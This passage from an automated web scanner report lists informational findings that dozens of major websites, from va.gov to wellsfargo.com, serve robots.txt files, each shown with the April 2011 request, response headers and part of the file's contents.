
Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.va.gov

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 29 May 2008 18:06:54 GMT
Accept-Ranges: bytes
ETag: "03396c6b6c1c81:0"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:33 GMT
Connection: close
Content-Length: 505
Set-Cookie: BIGipServerwww.va.gov_pool=1711384768.20480.0000; path=/
Set-Cookie: TSb10539=34a6d13d17a49ddaf12dbf6a8fd0ae3c3403a3c2bef2b6854d972535c2db820e29c468a6; Max-Age=900; Path=/

User-agent: *
Disallow: /cemetery/
Disallow: /med/osp/cgi-bin/
Disallow: /sec/
Disallow: /proj/va_sec_wg/
Disallow: /cgi-bin/
Disallow: /resdev/queri/members/
Disallow: /hyperfaq/
Disallow: /v
...[SNIP]...

24.880. http://www.vanguard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vanguard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vanguard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:50 GMT
Content-length: 745
Content-type: text/plain
Last-modified: Thu, 11 Sep 2008 20:22:39 GMT
Accept-ranges: bytes
Connection: close
Set-Cookie: HNWPRD=C21;path=/;domain=.vanguard.com;

# robots.txt for http://www.vanguard.com/

User-agent: *
Disallow: /web/stylesheet/
Disallow: /web/images/
Disallow: /web/javascript/
Disallow: /images/
Disallow: /international/common/common.j
...[SNIP]...

24.881. http://www.vast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vast.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa CONi TELi OUR BUS IND PHY ONL UNI COM NAV INT DEM STA"
Set-Cookie: V_UID=2cd33a596c57dc387fe95f8a92027c32; expires=Fri, 23-Mar-2012 13:43:38 GMT; path=/
Set-Cookie: V_T=6a3bddf026b6bd17684837955b85baf7; expires=Sat, 02-Apr-2011 14:13:38 GMT; path=/
Set-Cookie: V_CHNL=KGRpcmVjdCk%3D; expires=Tue, 30-Mar-2021 13:43:38 GMT; path=/
Content-Length: 410
Date: Sat, 02 Apr 2011 13:43:38 GMT
Connection: close
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Type: text/plain;charset=UTF-8
Keep-Alive: timeout=15, max=50

User-agent: Googlebot
User-agent: MSNBot
User-agent: Teoma
User-agent: Slurp
Disallow: /resources
Disallow: /ajax
Disallow: /merix
Disallow: /graphs
Disallow: /rpc
Disallow: /details
Disallow: /detail
...[SNIP]...

24.882. http://www.veoh.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.veoh.com

Response

HTTP/1.1 200 OK
Expires: Sat, 09 Apr 2011 13:34:15 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: veohCookie="VisitorUID=95AA1D01-B5B5-78C3-9E1D-74903F15C267&LastUpdate=02/Apr/2011:06:34:14 -0700&first=0"; domain=.veoh.com; Expires=Wed, 01 Apr 2015 13:34:14 GMT; Path=/
Cache-Control: max-age=604800
Content-Length: 110
Date: Sat, 02 Apr 2011 13:34:15 GMT
Connection: close
Last-Modified: Mon, 13 Dec 2010 10:56:38 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/plain; charset=UTF-8
Keep-Alive: timeout=15, max=13

User-agent: *
Disallow: /veohSiteMap.xml
Disallow: /sitemap_index.xml
Disallow: /static/sitemaps/feeds/


24.883. http://www.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:35 GMT
Server: Apache
Set-Cookie: v1st=B13A8F3026123C3C; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
ETag: "28e934c-9eb-49a38fa8970c0"
Accept-Ranges: bytes
Content-Length: 2539
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /aol/
Disallow: /att/
Disallow: /authentic/
Disallow: /aventail/
Disallow: /b2b/
Disallow: /cd/
Disallow: /cdrom/
Disallow: /cgi-bin/
Disallow: /checkpoint/
Disallow: /client/

...[SNIP]...

24.884. http://www.vh1.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vh1.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vh1.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Mon, 15 Feb 2010 19:35:48 GMT
ETag: "2f3219d-18b-47fa8b95dad00"
Accept-Ranges: bytes
Content-Length: 395
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:52:31 GMT
Connection: close

Sitemap: http://www.vh1.com/sitemap_index.jhtml
User-agent: *
Disallow: /interact/my_account
Disallow: /movies/browse
Disallow: /search/
Disallow: /video/search/
Disallow: /*?kw=vh1search2
Dis
...[SNIP]...

24.885. http://www.victoriassecret.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.victoriassecret.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.victoriassecret.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 23 Jul 2010 08:44:24 GMT
ETag: "226-48c0a0ab46a00"
Accept-Ranges: bytes
Content-Length: 550
SID: 502
Content-Type: text/plain
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS UNI PUR NAV INT STA PRE OTC"
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:42:33 GMT
Connection: close

User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /commerce/moreInfo.vs
Disallow: /search/
Disallow: /commerce/application?namespace=emailexclusive
Disallow: /CustomerService/
Disallow: /co
...[SNIP]...

24.886. http://www.videobash.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videobash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.videobash.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:09 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.13
Last-Modified: Fri, 09 Jul 2010 19:24:22 GMT
ETag: "51-4c377766"
Accept-Ranges: bytes
Content-Length: 81
Connection: close
Content-Type: text/plain
Set-Cookie: RNLBSERVERID=ded474; path=/
Cache-control: private

# robots.txt file for VideoBash

User-agent: *
Disallow: /video/player_related

24.887. http://www.videojug.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videojug.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.videojug.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Mar 2011 14:51:22 GMT
Accept-Ranges: bytes
ETag: "05150efe9eecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:56:57 GMT
Connection: close
Content-Length: 1613

User-agent: *
Disallow: /reportmessages
Disallow: /views/home/doubleclicktag.ashx
Disallow: /views/home/DownloadRedirect.ashx
Disallow: /neatupload/
Disallow: /signup
Disallow: /tag/*?*q=*
Disa
...[SNIP]...

24.888. http://www.videosurf.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videosurf.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.videosurf.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:16 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Thu, 31 Mar 2011 08:10:34 GMT
Accept-Ranges: bytes
Content-Length: 190
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: */rss
Disallow: */rss/
Disallow: /xml/
Disallow: /api/
Disallow: /embed/*
Disallow: /video/*?t=
Disallow: /videos-at-a-glance*
Disallow: /surfs/*
Disallow: /webui/*


24.889. http://www.viewpoints.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viewpoints.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.viewpoints.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 11 Jun 2010 02:38:13 GMT
ETag: "3a60e47-f37-488b807cbcf40"
Accept-Ranges: bytes
Content-Length: 3895
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the
# robots.txt file

User-agent: Googlebot
Disallow: /access/
Disallow: /admin/
Disallow: /categories/show/
Disallow:
...[SNIP]...

24.890. http://www.villagevoice.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.villagevoice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.villagevoice.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d Zend Core/2.5.0 PHP/5.2.4
ETag: "37cacf-1af-4ea2c8c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/plain
Age: 60671
Date: Sat, 02 Apr 2011 14:19:06 GMT
Last-Modified: Mon, 31 Jan 2011 22:55:07 GMT
Content-Length: 431
Connection: close

# Internal GSA appliance
User-agent: gsa-crawler
Disallow:

User-agent: 008
Crawl-delay: 10
Disallow: /

# Everyone else
User-agent: *
Crawl-delay: 1
Disallow: /feedback/
Disallow: /readers/
Disallow:
...[SNIP]...

24.891. http://www.vimeo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vimeo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vimeo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:22 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 20:28:47 GMT
ETag: "3a0921-214-e842fdc0"
Accept-Ranges: bytes
Content-Length: 532
Cache-Control: max-age=315360000
Expires: Tue, 30 Mar 2021 13:23:22 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.vimeo.com/sitemap.xml.gz

User-agent: Googlebot
Disallow: /log_in
Disallow: /sign_up
Disallow: /join
Disallow: /terms
Disallow: /privacy
Disallow: /download/
Allow: /

User-agent:
...[SNIP]...

24.892. http://www.virginia.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virginia.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.virginia.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:35 GMT
Server: Apache
P3P: policyref="http://www.virginiainteractive.org/w3c/p3p.xml", CP="NOI DSP COR CUR OUR NOR"
Last-Modified: Tue, 15 Jun 2010 18:41:16 GMT
ETag: "14aa1-ff-4c17c94c"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /vipnet/vipnet/
Disallow: /vipnet////
Disallow: /cmsarchive/
Disallow: /cmsportal2/cgi-bin/pw/
Disallow: /cmsportal3/cgi-bin/pw/
Disallow: /design/
Disallow: /cmsportal3/portal
...[SNIP]...

24.893. http://www.virginmobileusa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virginmobileusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.virginmobileusa.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7d DAV/2 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
ETag: W/"177-1301421189000"
Last-Modified: Tue, 29 Mar 2011 17:53:09 GMT
Content-Type: text/plain
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:39:44 GMT
Date: Sat, 02 Apr 2011 13:39:44 GMT
Content-Length: 177
Connection: close

User-agent: *
Disallow: /legal/
Disallow: */phones/catalogPurchase.do
Disallow: /*jsessionid
Disallow: */Register01.jsp
Sitemap: http://www.virginmobileusa.com/sitemap.xml

24.894. http://www.vistaprint.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vistaprint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vistaprint.com

Response

HTTP/1.0 200 OK
Content-Length: 899
Content-Type: text/plain
Last-Modified: Tue, 28 Dec 2010 18:23:24 GMT
Accept-Ranges: bytes
P3P: CP="VPRT "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Set-Cookie: v1st=14182FC3CA56E854; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.vistaprint.com

User-agent: *
Disallow: /answer.aspx
Disallow: /vp/errjscript.aspx
Disallow: /vp/fnf.aspx
Disallow: /vp/iiserror.asp
Disallow: /vp/sno.asp
Disallow: /vp/sno.aspx
Disallow: /vp/ns/myppp.aspx
Di
...[SNIP]...

24.895. http://www.vitals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:10 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 14:40:04 GMT
ETag: "211-49fc844d61900"
Accept-Ranges: bytes
Content-Length: 529
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /v/
Disallow: /terms
Disallow: /terms/
Disallow: /physicians/
Disallow: /doctor/profile/
Disallow: /doctor/checkup/
Disallow: /doctor/checkup
Disallow: /doctor/search/
Disallow
...[SNIP]...

24.896. http://www.vrbo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vrbo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vrbo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:54:56 GMT
Accept-Ranges: bytes
ETag: "20d84ea91951cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP CURa ADMa TAla OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:55:50 GMT
Connection: keep-alive
Content-Length: 5663

User-agent: *
disallow: /36flip/
disallow: /36flip/
disallow: /admin/
disallow: /Admin/
disallow: /adsandtps/
disallow: /Adsandtps/
disallow: /beta/
disallow: /Beta/
disallow: /custom/
disallow: /Cust
...[SNIP]...

24.897. http://www.walgreens.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walgreens.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.walgreens.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 23:45:49 GMT
Accept-Ranges: bytes
Content-Length: 943
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:31:00 GMT
Connection: close

# Robots.txt exclusion for walgreens.com

User-agent: *

Disallow: /common/
Disallow: /emailsignup/
Disallow: /includes/
Disallow: /library/checkdrug/
Disallow: /logout.jsp
Disallow: /messaging/
Disal
...[SNIP]...

24.898. http://www.walletpop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.walletpop.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:28 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 322
Keep-Alive: timeout=5, max=999818
Connection: Keep-Alive
Content-Type: text/plain

User-Agent: *
Disallow: /forward
Disallow: /traffic
Disallow: /mm_track
Disallow: /_uac/adpage.html
Disallow: /*?*a=ajax-comment-vote
Disallow: /*?*a=ajax-comment-show-replies
Disallow: /forwar
...[SNIP]...

24.899. http://www.walmart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walmart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Sat, 02 Apr 2011 02:58:17 GMT
ETag: "16c1c-d0-49fe6b2c549df"
Content-Type: text/plain; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 12:37:43 GMT
Content-Length: 208
Connection: close
Set-Cookie: dcenv=edc; path=/; domain=walmart.com

#go away
User-agent: *
Sitemap: http://www.walmart.com/Sitemap_Index.xml
Sitemap: http://www.walmart.com/EndecaBrowse_Sitemap_Index.xml
# Disallow the following URLs
Disallow: /solutions
Disallow: /cs
...[SNIP]...

24.900. http://www.wapedia.mobi/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wapedia.mobi
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wapedia.mobi

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Type: text/plain
Set-Cookie: SERVERID=srv106; path=/
Content-Length: 1019
Server: Wapedia
Date: Sat, 02 Apr 2011 13:43:43 GMT
X-Varnish: 1919134966
Age: 0
Via: 1.1 varnish
Connection: close


User-agent: Mediapartners-Google
Allow: /

User-Agent: taptubot
Allow: /


User-agent: thesubot
Disallow: /

User-Agent: OmniExplorer_Bot
Disallow: /


User-agent: Teleport*
Disallow: /

User-age
...[SNIP]...

24.901. http://www.warnerbros.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.warnerbros.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.warnerbros.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:02 GMT
Server: Apache
X-WBOL-WebServer: www_us
Set-cookie: WBWTID=173.193.214.243-4D972552245000006D50D6D-www-wb-web07; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Tue, 06 Apr 2010 19:35:42 GMT
ETag: "6174ad-8e-8d12df80"
Accept-Ranges: bytes
Content-Length: 142
Connection: close
Content-Type: text/plain

# robots.txt for http://www.warnerbros.com/
User-agent: *
Allow: /
Disallow: /landing    #Do not show the landing directory in search results

24.902. http://www.washingtonpost.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 15 Mar 2011 17:26:26 GMT
Content-Type: text/plain; charset=UTF-8
X-Cnection: close
Cache-Control: must-revalidate, max-age=539
Date: Sat, 02 Apr 2011 12:43:09 GMT
Content-Length: 1048
Connection: close

User-agent: ia_archiver
Disallow: /

User-agent: *
Crawl-delay: 1

# Disallow facets
Disallow: /*_print.html
Disallow: /*_email.html
Disallow: /*_singlePage.html
Disallow: /*_allComments.htm
...[SNIP]...

24.903. http://www.weather.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weather.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:29 GMT
Last-Modified: Fri, 04 Jun 2010 15:15:07 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Server: Apache
SVRNAME: web2x11
Vary: Accept-Encoding
Content-Length: 305
Connection: close

# /robots.txt
User-agent: *
Disallow: /cgi-bin
Disallow: /fcgi-bin
Disallow: /interact/photogallery/results.html
Disallow: /interact/photogallery/details.html
Disallow: /RealMedia
Disallow: /search/pa
...[SNIP]...

24.904. http://www.weather.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weather.gov

Response

HTTP/1.0 200 OK
Age: 126
X-Cache-TTL: 774
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:27:35 GMT
Content-Length: 86
Content-Type: text/plain; charset=iso-8859-1
Expires: Sat, 02 Apr 2011 13:42:35 GMT
Cache-Control: max-age=900
Server: Apache
Last-Modified: Tue, 01 May 2007 20:14:58 GMT
Vary: Accept-Encoding
Via: 1.1 nws-hq-cache03 (NetCache NetApp/6.0.7)
X-Cached-Time: Sat, 02 Apr 2011 13:27:35 GMT

User-agent: *
Disallow: /cgi-bin/
Disallow: /om/tropical/
Disallow: /xml/SOAP_server/

24.905. http://www.weatherbug.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weatherbug.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weatherbug.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2003.04.18T03:21-0400" exp "2004.04.18T12:00-0400" r (v 0 s 0 n 0 l 0))
P3P: CP="NOI DSP COR NID TAI STP UNI"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:44:05 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Wed, 02 Jan 2008 17:51:54 GMT
ETag: "8c9f4929684dc81:811"
Content-Length: 25

User-agent: *
Disallow:

24.906. http://www.webcrawler.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcrawler.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webcrawler.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 14 Jan 2011 22:46:26 GMT
Accept-Ranges: bytes
ETag: "04dae03cb4cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:35 GMT
Connection: close
Content-Length: 688

# We are overwhelmed by MSN Bots
User-agent: msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)
Crawl-delay: 30

User-agent: msnbot/1.1 ( http://search.msn.com/msnbot.htm)
Crawl-delay: 30

Us
...[SNIP]...

24.907. http://www.webgains.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webgains.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webgains.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 22 Sep 2009 08:50:37 GMT
ETag: "260e38-43-47426b12df140"
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:/components/
Disallow:/ewp/
Disallow:/mc/

24.908. http://www.webmd.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webmd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webmd.com

Response

HTTP/1.1 200 OK
Content-Length: 134
Content-Type: text/plain
Content-Location: http://www.webmd.com/robots.txt
Last-Modified: Tue, 19 Aug 2008 19:19:28 GMT
Accept-Ranges: bytes
ETag: "060a57f302c91:d8b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:38:03 GMT
Connection: keep-alive

# Robots.txt file WebMD
# Updated: Jan 2007

User-agent: *
Disallow: /404
Disallow: /500
Disallow: /search/search_results/

24.909. http://www.webring.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webring.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webring.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:40 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 12 May 2010 16:07:34 GMT
ETag: "2c30aee-ce-d7049d80"
Accept-Ranges: bytes
Content-Length: 206
Connection: close
Content-Type: text/plain

Sitemap: http://www.webring.com/sitemap.xml
User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow:

# Rover is the spawn of satan <http://www.roverbot.com>
User-agent: Roverbot
Disall
...[SNIP]...

24.910. http://www.webs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webs.com

Response

HTTP/1.1 200 OK
Set-Cookie: FW_PIN_HASH=R728969413; path=/
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 1077
Date: Sat, 02 Apr 2011 13:31:27 GMT
Connection: close

User-Agent: *
Allow: /*?$
Allow: /s/signup
Allow: /Signup
Disallow: /*?
Allow: /.htm
Disallow: /s/signup/templates*
Disallow: /Misc/
Disallow: /images.htm
Disallow: /Premium/
Disallow: /BlogB/
Disallo
...[SNIP]...

24.911. http://www.webshots.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webshots.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webshots.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:38 GMT
Server: Apache/2.0
Last-Modified: Tue, 09 Nov 2010 20:41:00 GMT
ETag: "56"
Accept-Ranges: bytes
Content-Length: 86
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /scripts/
Disallow: /cgi-bin/
Disallow: /s/
Disallow: /search

24.912. http://www.weightwatchers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weightwatchers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weightwatchers.com

Response

HTTP/1.1 200 OK
Content-Length: 175
Content-Type: text/plain
Last-Modified: Wed, 24 Nov 2010 20:56:51 GMT
Accept-Ranges: bytes
ETag: "4293e1e1a8ccb1:247"
CP: CAO DSP CURa ADMa DEVa TAIa PSAa IVAa CONi OTPa OUR SAMa STP PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:38 GMT
Connection: close

User-agent: *
Disallow: /monthlypass/signup.aspx
Disallow: /monthlypasscancellation
Disallow: /SiteRequirements.aspx
Disallow: /templates/marketing/Landing_1col_nonav.aspx

24.913. http://www.wellness.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellness.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellness.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 12:17:50 GMT
Server: Microsoft-IIS/6.0
Cache-Control: max-age=2592000
Content-Length: 404
Content-Type: text/plain
Last-Modified: Fri, 25 Mar 2011 18:45:20 GMT
Accept-Ranges: bytes
ETag: ""
X-Powered-By: ASP.NET
Age: 4561
X-Cache: HIT from squid3.earnware.corp
X-Cache-Lookup: HIT from squid3.earnware.corp:80
Via: 1.0 wellness.com, 1.0 squid3.earnware.corp (squid)
Connection: close

User-agent: *
Visit-time: 1800-0400

Disallow: /chirobycity/
Disallow: /deb/
Disallow: /new/
Disallow: /archive/
Disallow: /pics/
Disallow: /search/
Disallow: /burst/
Disallow: /manager/
Di
...[SNIP]...

24.914. http://www.wellsfargo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellsfargo.com

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Sat, 02 Apr 2011 12:43:52 GMT
Content-length: 6797
Content-type: text/plain
Set-Cookie: v1st=5EDD4CEB1FE4A5C5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Last-modified: Fri, 11 Feb 2011 13:31:40 GMT
